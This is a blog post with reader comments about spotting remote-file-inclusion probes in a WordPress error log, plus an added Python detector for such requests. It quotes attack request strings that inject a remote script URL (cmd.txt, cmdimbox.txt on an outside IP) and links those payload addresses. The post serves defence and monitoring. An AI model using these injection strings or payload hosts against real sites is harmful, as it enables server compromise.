Random hacking attempt
I just happened to have PuTTY open with shell access to my server and I was monitoring the error_log for this domain when I noticed these errors popping up:
[Thu Nov 15 14:46:52 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/2007/11/09/php-techniques-i-use-all-the-time/home.php?i=http://201.37.71.117:8090/cmd.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38
[Thu Nov 15 14:46:54 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/home.php?i=http://201.37.71.117:8090/cmd.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38
[Thu Nov 15 14:47:01 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/2007/11/09/php-techniques-i-use-all-the-time/home.php?i=http://201.37.71.117:8090/cmdimbox.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38
[Thu Nov 15 14:47:02 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/home.php?i=http://201.37.71.117:8090/cmdimbox.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38
I’m not an expert when it comes to hacking, but I could tell what was going on here, so I decided to check out the addresses that were being passed:
http://201.37.71.117:8090/cmd.txt
If you go there, you will find a very nice set of PHP commands that attempt to expose holes, security information and so on.
http://201.37.71.117:8090/cmdimbox.txt
I don’t quite understand this one, but the comments say:
scan inb0x hotmail v1.0
I don’t know if the owner of the server is the one using this script, because the server appears to be a game server:
Maybe this post will alert the owner of the server… I’m probably going to keep my error log open much more often now.
Interesting and very scary, these types of things. Could you write a post about how you monitor that error log?
I’m not so sure the owner would be that bothered - try googling the IP address, it’s been busy for a while!
I guess that second script is just trying to get the user PHP is running as (by emailing it back to them) so they can try to log in via SSH or whatever - once you have a valid username you’re halfway there!
I’ll just share it here… I have Plesk on my server that handles the vhosts directory to host all my domains so my error_log file is here:
/var/www/vhosts/domain.com/statistics/logs/error_log
This log is for all script errors… Apache errors and mail errors have their own logs that are not domain-specific. Anyway, this is the address, and to “monitor” the log I just need to watch the end of it, which I do with:
tail -f address
Where “address” is the long path I just showed you.
If I see something in the log that I want to copy, it’s just highlight, right-click in PuTTY.
I don’t allow error reporting in my PHP scripts, so I monitor this log to see errors; this is less convenient but more secure. I actually spotted these hacking attempts because I was monitoring the logs to debug my latest Facebook app: Mob Art
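As an added example (not code from the post or its commenters), here is a small Python detector for the pattern shown in the post: it parses error_log lines of the format quoted above, flags any request whose query parameter is itself a remote URL (the remote-file-inclusion probe behind home.php?i=http://.../cmd.txt), and groups the payload hosts per client, which is the kind of anomaly a tail -f or logwatch watcher is looking for. The sample lines are constructed from the post's own entries plus one benign warning that must not be flagged.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample input in the format of the PHP warnings quoted in the post
# (first two lines), plus one benign warning (client 192.0.2.10) to be ignored.
SAMPLE_LOG = """\
[Thu Nov 15 14:46:52 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/2007/11/09/php-techniques-i-use-all-the-time/home.php?i=http://201.37.71.117:8090/cmd.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38
[Thu Nov 15 14:46:54 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/home.php?i=http://201.37.71.117:8090/cmdimbox.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38
[Thu Nov 15 14:47:10 2007] [error] [client 192.0.2.10] PHP Warning: parse_url(/about/?page=2) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38
"""

# Apache error_log line as PHP writes it: timestamp, level, client IP, then the
# warning text; the parse_url() argument is the request URI the plugin saw.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[\d.]+)\] "
    r"PHP Warning: parse_url\((?P<arg>.*?)\) \["
)
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def find_rfi_attempts(log_text):
    """One record per warning whose request URI carries a query parameter that
    is itself a remote URL, i.e. the remote-file-inclusion probe from the post."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        uri = urlsplit(m.group("arg"))
        for name, values in parse_qs(uri.query, keep_blank_values=True).items():
            for value in values:
                if REMOTE_SCHEME.match(value):
                    # The trailing "?" marks are part of the probe: they turn whatever
                    # a vulnerable include() appends into a query string of the URL.
                    hits.append({"time": m.group("ts"), "client": m.group("ip"),
                                 "path": uri.path, "param": name,
                                 "remote": value.rstrip("?")})
    return hits

def hosts_by_client(hits):
    """Group the payload hosts each client tried to pull in: one source, many URLs."""
    summary = {}
    for h in hits:
        host = urlsplit(h["remote"]).netloc
        summary.setdefault(h["client"], set()).add(host)
    return {client: sorted(hosts) for client, hosts in summary.items()}

if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG):
        print(f"{h['time']}  {h['client']}  {h['path']}?{h['param']}=  ->  {h['remote']}")
```

Pipe the live file in with `tail -f error_log` and call `find_rfi_attempts` on each line to get the same alerting without reading the whole log by eye.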
ns: Good catch, it’s a launch pad for hackers.
You might want to try something like ‘logwatch’, which will pick up on these anomalies and email you when it finds something - it might already be installed, at least it is with Fedora. It’s worthwhile because you will pick up on these things as they are happening.
Thanks. Will definitely give it a try.